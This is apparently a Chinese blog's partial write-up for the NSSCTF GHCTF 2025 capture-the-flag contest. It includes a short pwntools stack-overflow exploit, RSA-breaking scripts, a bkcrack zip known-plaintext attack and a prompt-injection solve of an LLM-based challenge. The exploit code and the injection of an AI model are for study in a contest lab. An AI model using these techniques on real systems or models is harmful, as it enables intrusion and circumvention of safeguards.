默认分类

NSSCTF GHCTF 2025 新生赛(公开赛道) 部分wp

霍雅

2025-03-08

3 评论

421 阅读

正在检测是否收录...

03/08

最终排名129/802（只计算有分的战队）
因为没有web手，一个pwn和一个流量是我队友做的

reverse

ASM?Signin!

来检验一下你的8086汇编基础吧！回顾或许能找到更好的方式。
详见https://www.huoya.work/bk/index.php/archives/157/

PWN
Hello_world
Welcome come to the world of PWN
简单栈溢出

有shellcode
直接构造payload

from pwn import *

#p = remote("node2.anna.nssctf.cn",28826)
p=process("./attachment")
padding = 0x20 + 8
back = b'\xc5\x09'

p.send(b'a'*0x28+back)
p.interactive()

crypto

baby_factor

给了e n phi c 直接算d

from Crypto.Util.number import *
def create():
    pl  = []
    for i in range(3):
        pl.append(getPrime(1024))
    return sorted(pl)
pl = create()
m=b'NSSCTF{xxx}'
p,q,r = pl[0],pl[1],pl[2]
e = 65537
n = p*q*r
phi = (p-1)*(q-1)*(r-1)
c=pow(bytes_to_long(m),e,n)
print(f'n={n}')
print(f'phi={phi}')
print(f'c={c}')
"""
n=2741832985459799195551463586200496171706401045582705736390510500694289553647578857170635209048629428396407631873312962021354740290808869502374444435394061448767702908255197762575345798570340246369827688321483639197634802985398882606068294663625992927239602442735647762662536456784313240499437659967114509197846086151042512153782486075793224874304872205720564733574010669935992016367832666397263951446340260962650378484847385424893514879629196181114844346169851383460163815147712907264437435463059397586675769959094397311450861780912636566993749356097243760640620004707428340786147078475120876426087835327094386842765660642186546472260607586011343238080538092580452700406255443887820337778505999803772196923996033929998741437250238302626841957729397241851219567703420968177784088484002831289722211924810899441563382481216744212304879717297444824808184727136770899310815544776369231934774967139834384853322157766059825736075553
phi=2741832985459799195551463586200496171706401045582705736390510500694289553647578857170635209048629428396407631873312962021354740290808869502374444435394061448767702908255197762575345798570340246369827688321483639197634802985398882606068294663625992927239602442735647762662536456784313240499437659967114509197784246608456057052779643060628984335578973450260519106769911425793594847759982583376628098472390090331415895352869275325656949958242181688663465437185437198392460569653734315961071709533645370007008616755547195108861900432818710027794402838336405197750190466425895582236209479543326147804766393022786785337752319686125574507066082357748118175068545756301823381723776525427724798780890160482013759497102382173931716030992837059880049832065500252713739288235410544982532170147652055063681116147027591678349638753796122845041417275362394757384204924094885233281257928031484806977974575497621444483701792085077113227851520
c=2675023626005191241628571734421094007494866451142251352071850033504791090546156004348738217761733467156596330653396106482342801412567035848069931148880296036606611571818493841795682186933874790388789734748415540102210757974884805905578650801916130709273985096229857987312816790471330181166965876955546627327549473645830218664078284830699777113214559053294592015697007540297033755845037866295098660371843447432672454589238297647906075964139778749351627739005675106752803394387612753005638224496040203274119150075266870378506841838513636541340104864561937527329845541975189814018246183215952285198950920021711141273569490277643382722047159198943471946774301837440950402563578645113393610924438585345876355654972759318203702572517614743063464534582417760958462550905093489838646250677941813170355212088529993225869303917882372480469839803533981671743959732373159808299457374754090436951368378994871937358645247263240789585351233
"""

exp如下：NSSCTF{W0W!!_Y0u_4r3_g00d_G03!!!}

import gmpy2
import libnum
e=65537
n=
phi=
c=
#自己填，数据太多了不好看
d = gmpy2.invert(e, phi)
m=pow(c,d,n)
print(libnum.n2s(int(m)))

baby_signin

import libnum
from Crypto.Util.number import getPrime, bytes_to_long
p=getPrime(128)
q=getPrime(128)
n=p*q
phi=(p-1)*(q-1)
flag="NSSCTF{xxxxxx}"
print("p=",p)
print("q=",q)
m=bytes_to_long(flag.encode())
e=4
c=pow(m,e,n)
print("c=",c)
print("n=",n)
'''
e=4
p= 182756071972245688517047475576147877841
q= 305364532854935080710443995362714630091
c= 14745090428909283741632702934793176175157287000845660394920203837824364163635
n= 55807222544207698804941555841826949089076269327839468775219849408812970713531
'''
print(libnum.n2s(11019499260328699572))

e=4，rsa常规解法条件：1<e<phi_n,e与phi_互质且为质数
所以常规解不行，尝试了当e约去公约数、CRT、AMM都无法解出
最后是在在模q和p下分别求四次方根再用CRT合并
exp如下：NSSCTF{4MM_1s_so_e4s7!}

from sympy.ntheory.modular import crt
from sympy.ntheory.residue_ntheory import sqrt_mod

# 已知的参数
p = 182756071972245688517047475576147877841
q = 305364532854935080710443995362714630091
n = p * q
c = 14745090428909283741632702934793176175157287000845660394920203837824364163635

def fourth_roots(modulus, c):
    # 先求平方根: r^2 = c (mod modulus)
    roots_1 = sqrt_mod(c, modulus, all_roots=True)
    fourth_root_candidates = []
    for r in roots_1:
        # 再求平方根: s^2 = r (mod modulus)
        try:
            roots_2 = sqrt_mod(r, modulus, all_roots=True)
            fourth_root_candidates.extend(roots_2)
        except Exception:
            # 如果 r 不是平方剩余，则跳过
            continue
    return list(set(fourth_root_candidates))

# 求模 p 和 q 下的所有四次方根
roots_p = fourth_roots(p, c % p)
roots_q = fourth_roots(q, c % q)

# CRT 合并候选解
candidates = []
for rp in roots_p:
    for rq in roots_q:
        # 合并 rp (mod p) 和 rq (mod q)
        x, _ = crt([p, q], [rp, rq])
        candidates.append(x)

# 筛选出可能的 flag（转换为 bytes 后判断格式）
for cand in candidates:
    try:
        m_bytes = cand.to_bytes((cand.bit_length() + 7) // 8, 'big')
        if m_bytes.startswith(b'NSSCTF{') and m_bytes.endswith(b'}'):
            print("Flag:", m_bytes)
    except Exception:
        continue

具体原理如下：

EZ_Fermat

看起来像求解离散对数？但其实不是的！
代码如下

from Crypto.Util.number import getPrime, bytes_to_long
from secret import f

flag = b'NSSCTF{test_flag}'
p = getPrime(512)
q = getPrime(512)
n = p*q

m = bytes_to_long(flag)
e = 65537
c = pow(m,e,n)

R.<x> = ZZ[]
f = R(str(f))

w = pow(2,f(p),n)


print(f'{n = }\n')
print(f'{e = }\n')
print(f'{c = }\n')
print(f'{f = }\n')
print(f'{w = }\n')


'''
n = 101780569941880865465631942473186578520071435753163950944409148606282910806650879176280021512435190682009749926285674412651435782567149633130455645157688819845748439487113261739503325065997835517112163014056297017874761742768297646567397770742374004940360061700285170103292360590891188591132054903101398360047
e = 65537
c = 77538275949900942020886849496162539665323546686749270705418870515132296087721218282974435210763225488530925782158331269160555819622551413648073293857866671421886753377970220838141826468831099375757481041897142546760492813343115244448184595644585857978116766199800311200819967057790401213156560742779242511746
f = 2*x^332 - x^331 + x^329 + 3*x^328 - x^327 - 3*x^325 + x^323 - 3*x^322 - x^321 - 3*x^320 + x^319 + 2*x^318 - 4*x^317 - 3*x^315 - 2*x^314 + x^313 + x^312 + 2*x^311 + 2*x^309 + 2*x^308 + 5*x^307 + 2*x^306 + 3*x^305 + 5*x^304 + 4*x^303 + x^302 - x^301 - x^300 - 2*x^299 - 2*x^298 + x^297 + 3*x^296 - x^295 - 4*x^292 - x^290 + 4*x^289 - x^287 - 3*x^286 + x^285 - 2*x^284 + x^283 - x^282 - 2*x^281 + x^280 - 2*x^279 + x^278 + 2*x^277 - 3*x^276 - x^275 - 4*x^274 - 3*x^273 - 5*x^272 - 2*x^271 - 3*x^270 + 2*x^269 + 2*x^268 - x^267 - 2*x^266 + x^265 + x^264 - 3*x^262 - 3*x^259 + 2*x^258 - x^257 + 2*x^256 + 2*x^255 - x^254 - 2*x^253 - x^252 + 2*x^251 - x^250 + x^249 + 2*x^247 + 2*x^246 + 2*x^245 - 2*x^244 - 3*x^243 + 2*x^242 - 3*x^241 - x^240 - 3*x^239 - x^236 - 3*x^235 - 2*x^234 - x^233 - 2*x^232 - x^231 - 3*x^230 - 2*x^229 - 4*x^228 - 2*x^227 - 3*x^226 + 2*x^225 + x^224 - x^223 - 2*x^221 + 3*x^219 - x^217 - 2*x^216 + x^215 + 2*x^213 - x^212 + 3*x^211 + x^210 + 4*x^209 + x^208 - x^206 - x^205 - x^204 + 2*x^203 - 3*x^202 + 2*x^199 - x^198 + 2*x^196 - 2*x^195 + 3*x^194 + 3*x^193 - x^192 + 4*x^191 + 2*x^189 + x^186 - x^185 - x^184 + 3*x^183 + x^182 + 2*x^181 - 2*x^180 + x^177 + x^175 - x^173 + 3*x^172 + x^170 + x^169 - x^167 - 2*x^166 - x^165 - 4*x^164 - 2*x^163 + 2*x^162 + 4*x^161 - 2*x^160 - 3*x^159 - 2*x^158 - 2*x^157 + x^156 - x^155 + 3*x^154 - 4*x^153 + x^151 + 2*x^150 + x^149 - x^148 + 2*x^147 + 3*x^146 + 2*x^145 - 4*x^144 - 4*x^143 + x^142 - 2*x^140 - 2*x^139 + 2*x^138 + 3*x^137 + 3*x^136 + 3*x^135 + x^134 - x^133 + 2*x^132 + 3*x^130 - 3*x^129 - 2*x^128 - x^127 - 2*x^126 + x^125 + x^124 - 2*x^123 + x^122 - x^121 + 3*x^120 - x^119 - 2*x^118 - x^117 - x^116 - 2*x^115 + 2*x^114 + 2*x^113 - 3*x^112 - x^111 - 4*x^110 + x^109 + x^108 + x^106 - 4*x^105 + x^104 - x^103 - x^101 + x^100 - 2*x^99 + x^98 - x^97 + 3*x^96 + 3*x^94 - x^93 - x^92 + x^91 - 2*x^90 + x^89 - x^88 + x^87 - x^86 + x^85 + x^84 - x^83 + x^79 - 3*x^78 - 2*x^77 + x^74 + 3*x^73 - x^72 - 3*x^71 - 2*x^70 + x^69 - 3*x^66 + x^65 + x^64 - 4*x^62 - x^61 + x^60 - x^59 + 3*x^58 - x^57 - x^54 + 3*x^53 + x^51 - 3*x^50 - x^49 + 2*x^47 - x^46 - x^44 + x^43 - x^42 - 4*x^41 - 3*x^39 - x^37 - x^36 - 3*x^35 + x^34 + x^33 - 2*x^32 + 2*x^31 - x^30 + 2*x^29 - 2*x^28 - 2*x^27 - x^24 + x^22 - 5*x^21 + 3*x^20 + 2*x^19 - x^18 + 2*x^17 + x^16 - 2*x^15 - 2*x^14 + x^13 + x^12 + 2*x^11 - 3*x^10 + 3*x^9 + 2*x^8 - 4*x^6 - 2*x^5 - 4*x^4 + x^3 - x^2 - 1
w = 32824596080441735190523997982799829197530203904568086251690542244969244071312854874746142497647579310192994177896837383837384405062036521829088599595750902976191010000575697075792720479387771945760107268598283406893094243282498381006464103080551366587157561686900620059394693185990788592220509670478190685244
'''

为了解这个CTF密码题，我们需要利用给定的多项式f和计算结果w来分解RSA模数n。以下是详细步骤和Python解决方案：

方法思路
分析多项式：计算多项式f在x=1处的值，即f(1)。这个值是所有系数的代数和。

模运算转换：利用费马小定理，将w = 2^f(p) mod n转换为模p下的表达式，即w ≡ 2^f(1) mod p。

分解n：通过计算gcd(n, w - 2^f(1) mod n)来找到n的一个因子p或q。

解密RSA：使用分解后的p和q计算私钥d，解密密文c得到明文m。

exp如下：NSSCTF{8d1e3405044a79b23a44a43084bd994b}

import re
import math
from Crypto.Util.number import long_to_bytes

n = 101780569941880865465631942473186578520071435753163950944409148606282910806650879176280021512435190682009749926285674412651435782567149633130455645157688819845748439487113261739503325065997835517112163014056297017874761742768297646567397770742374004940360061700285170103292360590891188591132054903101398360047
e = 65537
c = 77538275949900942020886849496162539665323546686749270705418870515132296087721218282974435210763225488530925782158331269160555819622551413648073293857866671421886753377970220838141826468831099375757481041897142546760492813343115244448184595644585857978116766199800311200819967057790401213156560742779242511746
w = 32824596080441735190523997982799829197530203904568086251690542244969244071312854874746142497647579310192994177896837383837384405062036521829088599595750902976191010000575697075792720479387771945760107268598283406893094243282498381006464103080551366587157561686900620059394693185990788592220509670478190685244
f_str = "2*x^332 - x^331 + x^329 + 3*x^328 - x^327 - 3*x^325 + x^323 - 3*x^322 - x^321 - 3*x^320 + x^319 + 2*x^318 - 4*x^317 - 3*x^315 - 2*x^314 + x^313 + x^312 + 2*x^311 + 2*x^309 + 2*x^308 + 5*x^307 + 2*x^306 + 3*x^305 + 5*x^304 + 4*x^303 + x^302 - x^301 - x^300 - 2*x^299 - 2*x^298 + x^297 + 3*x^296 - x^295 - 4*x^292 - x^290 + 4*x^289 - x^287 - 3*x^286 + x^285 - 2*x^284 + x^283 - x^282 - 2*x^281 + x^280 - 2*x^279 + x^278 + 2*x^277 - 3*x^276 - x^275 - 4*x^274 - 3*x^273 - 5*x^272 - 2*x^271 - 3*x^270 + 2*x^269 + 2*x^268 - x^267 - 2*x^266 + x^265 + x^264 - 3*x^262 - 3*x^259 + 2*x^258 - x^257 + 2*x^256 + 2*x^255 - x^254 - 2*x^253 - x^252 + 2*x^251 - x^250 + x^249 + 2*x^247 + 2*x^246 + 2*x^245 - 2*x^244 - 3*x^243 + 2*x^242 - 3*x^241 - x^240 - 3*x^239 - x^236 - 3*x^235 - 2*x^234 - x^233 - 2*x^232 - x^231 - 3*x^230 - 2*x^229 - 4*x^228 - 2*x^227 - 3*x^226 + 2*x^225 + x^224 - x^223 - 2*x^221 + 3*x^219 - x^217 - 2*x^216 + x^215 + 2*x^213 - x^212 + 3*x^211 + x^210 + 4*x^209 + x^208 - x^206 - x^205 - x^204 + 2*x^203 - 3*x^202 + 2*x^199 - x^198 + 2*x^196 - 2*x^195 + 3*x^194 + 3*x^193 - x^192 + 4*x^191 + 2*x^189 + x^186 - x^185 - x^184 + 3*x^183 + x^182 + 2*x^181 - 2*x^180 + x^177 + x^175 - x^173 + 3*x^172 + x^170 + x^169 - x^167 - 2*x^166 - x^165 - 4*x^164 - 2*x^163 + 2*x^162 + 4*x^161 - 2*x^160 - 3*x^159 - 2*x^158 - 2*x^157 + x^156 - x^155 + 3*x^154 - 4*x^153 + x^151 + 2*x^150 + x^149 - x^148 + 2*x^147 + 3*x^146 + 2*x^145 - 4*x^144 - 4*x^143 + x^142 - 2*x^140 - 2*x^139 + 2*x^138 + 3*x^137 + 3*x^136 + 3*x^135 + x^134 - x^133 + 2*x^132 + 3*x^130 - 3*x^129 - 2*x^128 - x^127 - 2*x^126 + x^125 + x^124 - 2*x^123 + x^122 - x^121 + 3*x^120 - x^119 - 2*x^118 - x^117 - x^116 - 2*x^115 + 2*x^114 + 2*x^113 - 3*x^112 - x^111 - 4*x^110 + x^109 + x^108 + x^106 - 4*x^105 + x^104 - x^103 - x^101 + x^100 - 2*x^99 + x^98 - x^97 + 3*x^96 + 3*x^94 - x^93 - x^92 + x^91 - 2*x^90 + x^89 - x^88 + x^87 - x^86 + x^85 + x^84 - x^83 + x^79 - 3*x^78 - 2*x^77 + x^74 + 3*x^73 - x^72 - 3*x^71 - 2*x^70 + x^69 - 3*x^66 + x^65 + x^64 - 4*x^62 - x^61 + x^60 - x^59 + 3*x^58 - x^57 - x^54 + 3*x^53 + x^51 - 3*x^50 - x^49 + 2*x^47 - x^46 - x^44 + x^43 - x^42 - 4*x^41 - 3*x^39 - x^37 - x^36 - 3*x^35 + x^34 + x^33 - 2*x^32 + 2*x^31 - x^30 + 2*x^29 - 2*x^28 - 2*x^27 - x^24 + x^22 - 5*x^21 + 3*x^20 + 2*x^19 - x^18 + 2*x^17 + x^16 - 2*x^15 - 2*x^14 + x^13 + x^12 + 2*x^11 - 3*x^10 + 3*x^9 + 2*x^8 - 4*x^6 - 2*x^5 - 4*x^4 + x^3 - x^2 - 1"

# 预处理字符串，移除空格和乘号
f_str = f_str.replace(' ', '').replace('*', '')

# 使用正则表达式分割各个项
terms = re.findall(r'([+-]?[^+-]+)', f_str)

sum_coeff = 0

for term in terms:
    term = term.strip()
    if not term:
        continue

    sign = 1
    if term[0] == '-':
        sign = -1
        term = term[1:]
    elif term[0] == '+':
        term = term[1:]

    if 'x' not in term:
        # 处理常数项
        if term:
            sum_coeff += sign * int(term)
        else:
            # 空项，如单独的符号，这里不会出现
            pass
    else:
        # 分割系数和x部分
        parts = term.split('x', 1)
        coeff_part = parts[0]

        if coeff_part == '':
            # 如x^2, -x^3等
            coeff = 1
        else:
            # 系数部分
            coeff = int(coeff_part) if coeff_part else 1

        sum_coeff += sign * coeff

print(f"Sum of coefficients (f(1)): {sum_coeff}")

# 计算t = 2^f(1) mod n，考虑负指数
if sum_coeff < 0:
    exponent = -sum_coeff
    t = pow(2, exponent, n)
    t = pow(t, -1, n)  # 模逆元
else:
    t = pow(2, sum_coeff, n)

# 计算k = w - t mod n
k = (w - t) % n

# 计算gcd(n, k)
p = math.gcd(n, k)
if p != 1 and p != n:
    q = n // p
    print(f"Successfully factored n: p = {p}\nq = {q}")
else:
    print("Failed to factor n")
    exit()

# 计算私钥d
phi = (p - 1) * (q - 1)
d = pow(e, -1, phi)

# 解密密文
m = pow(c, d, n)
flag = long_to_bytes(m)
print(f"Decrypted flag: {flag}")

MISC

mybrave

使用了常规方法，伪加密、爆破、binwwalk等都没用
使用bkcrack明文攻击
具体用法，查看这篇文章的下半部分
https://www.huoya.work/bk/index.php/archives/122/
压缩包解出来是一个图片，用010打开到末尾有一段base64编码，解码得flag

mycode

一个简单的算法练手题
题目描述：
我会给N个数字，每个数字不超过6位，你需要拼接这N个数字，使你最后拼接的这个数最小。在100s内连续无误解决100个问题即可获得flag。
2 <= N <= 100
Numbers: 6 33 432 0018 98 02
Smallest: (Your Input)
Smallest: 180233432698
通过nc访问靶场，可以看到给了一串数字，也可以看到输入正确能得到Correct！，但是限时100s内解决100个问题，所以手解是不可能的，写脚本

通过简单脚本实现 NSSCTF{021ec566-0257-45e8-ad3e-6347fcbdf62b}

exp如下

from functools import cmp_to_key
import socket
import time


def smallest_concatenated_number(nums):
    str_nums = [str(n) for n in nums]

    def compare(a, b):
        return -1 if (a + b) < (b + a) else 1

    sorted_nums = sorted(str_nums, key=cmp_to_key(compare))
    result = ''.join(sorted_nums).lstrip('0')
    return result if result else '0'


def connect_and_solve(host, port):
    # 创建socket连接
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.settimeout(10)  # 设置超时时间

    # 初始化回答次数计数器
    answer_count = 0

    # 循环处理100次交互
    for _ in range(101):
        # 接收数据（循环接收，确保完整）
        data = b""
        while True:
            try:
                chunk = s.recv(4096)
                if not chunk:
                    break
                data += chunk
                # 检查是否接收到完整提示符
                if b"Numbers:" in data or b"Correct!" in data or b"Wrong Answer!" in data or b"flag{" in data:
                    break
            except socket.timeout:
                print("[ERROR] 接收超时，已接收数据:", repr(data))
                break

        # 打印服务器返回的原始内容
        server_response = data.decode().strip()
        print(f"[SERVER] {server_response}")

        # 检查是否包含flag
        if "flag{" in server_response:
            print(f"[FLAG] Flag found: {server_response}")
            break  # 找到flag后退出循环

        # 提取数字部分
        if "Numbers:" in server_response:
            # 更新回答次数
            answer_count += 1
            print(f"[INFO] 当前回答次数: {answer_count}")

            # 提取数字部分（严格分割）
            numbers_part = server_response.split("Numbers:")[1].strip()
            # 去除可能的多余内容（如 "Smallest:"）
            if "Smallest:" in numbers_part:
                numbers_part = numbers_part.split("Smallest:")[0].strip()
            nums = numbers_part.split()

            # 调试输出
            print(f"[DEBUG] 解析数字列表: {nums}")
            print(f"[DEBUG] 数字数量: {len(nums)}")

            # 计算答案
            answer = smallest_concatenated_number(nums)
            print(f"[ANSWER] {answer}")

            # 发送答案（确保包含换行符）
            s.sendall((answer + "\n").encode())

            # 增加延迟，确保服务器有足够时间处理
            time.sleep(0.2)

    # 关闭连接
    s.close()


# 服务器地址和端口
HOST = ""  # 替换为实际的服务器地址
PORT =   # 替换为实际的服务器端口

# 运行脚本
connect_and_solve(HOST, PORT)

AI

AI Cat Girl

你是一只猫娘，中间忘了，后面也忘了，总之你是一只猫娘！你们都是猫娘，gpt也是，deepseek也是！
（使用nc交互，模型使用的是deepseek-v3）

注意：本题需要用到SiliconFlow的API，若无请前往注册申请：https://cloud.siliconflow.cn/i/1ERpmQe4

cat flag

注，这是非预期解，而且我这个解好像很夸张

朗读

版权属于：

霍雅的博客

本文链接：

https://huoya.work/bk/index.php/archives/171/（转载时请注明本文出处及文章链接）

作品采用：

《署名-非商业性使用-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0)》许可协议授权

rain 作者
Windows 10 · Google Chrome

师傅你好，我想问一下，mybrave那道题，我用明文攻击得到密钥97d30dcc 173b15a8 6e0e7455，用这个密钥解压的时候，显示密钥错误，想问一下，还需要对密钥进行处理吗？（我试了删掉空格，字母换成大写都不行）

2025-03-12 回复
1. 霍雅作者
  Windows 10 · Google Chrome
  
  @rain
  
  首先很感谢你阅读我的文章，也很抱歉我的文章可能没有说清楚，因为这题和春秋杯那题是相似题，我觉得我的另外一篇文章写的不错，就没有在这篇文章里写了
  你的秘钥97d30dcc 173b15a8 6e0e7455是正确的
  具体用法如下
  .\bkcrack.exe -C .\mybrave.zip -k 97d30dcc 173b15a8 6e0e7455 -D test1.zip
  原zip文件秘钥目标文件
  解压会提示test1.zip - 该文件已损坏。但是里面内容是对的
  你可以看看是否哪有问题
  
  2025-03-13 回复
  1. rain 作者
    Windows 10 · Google Chrome
    
    @霍雅
    
    谢谢师傅！我后面又去找了其他利用bkcrack明文攻击的例子，发现密钥！= 密码，我把密钥当成压缩包密码这个行为是错的，具体原因我觉得我需要研究一下store算法才能理解。最后还是非常感谢师傅回复我（另：春秋杯那题其实我也去看了，但可能是我看的不太仔细
    
    2025-03-13 回复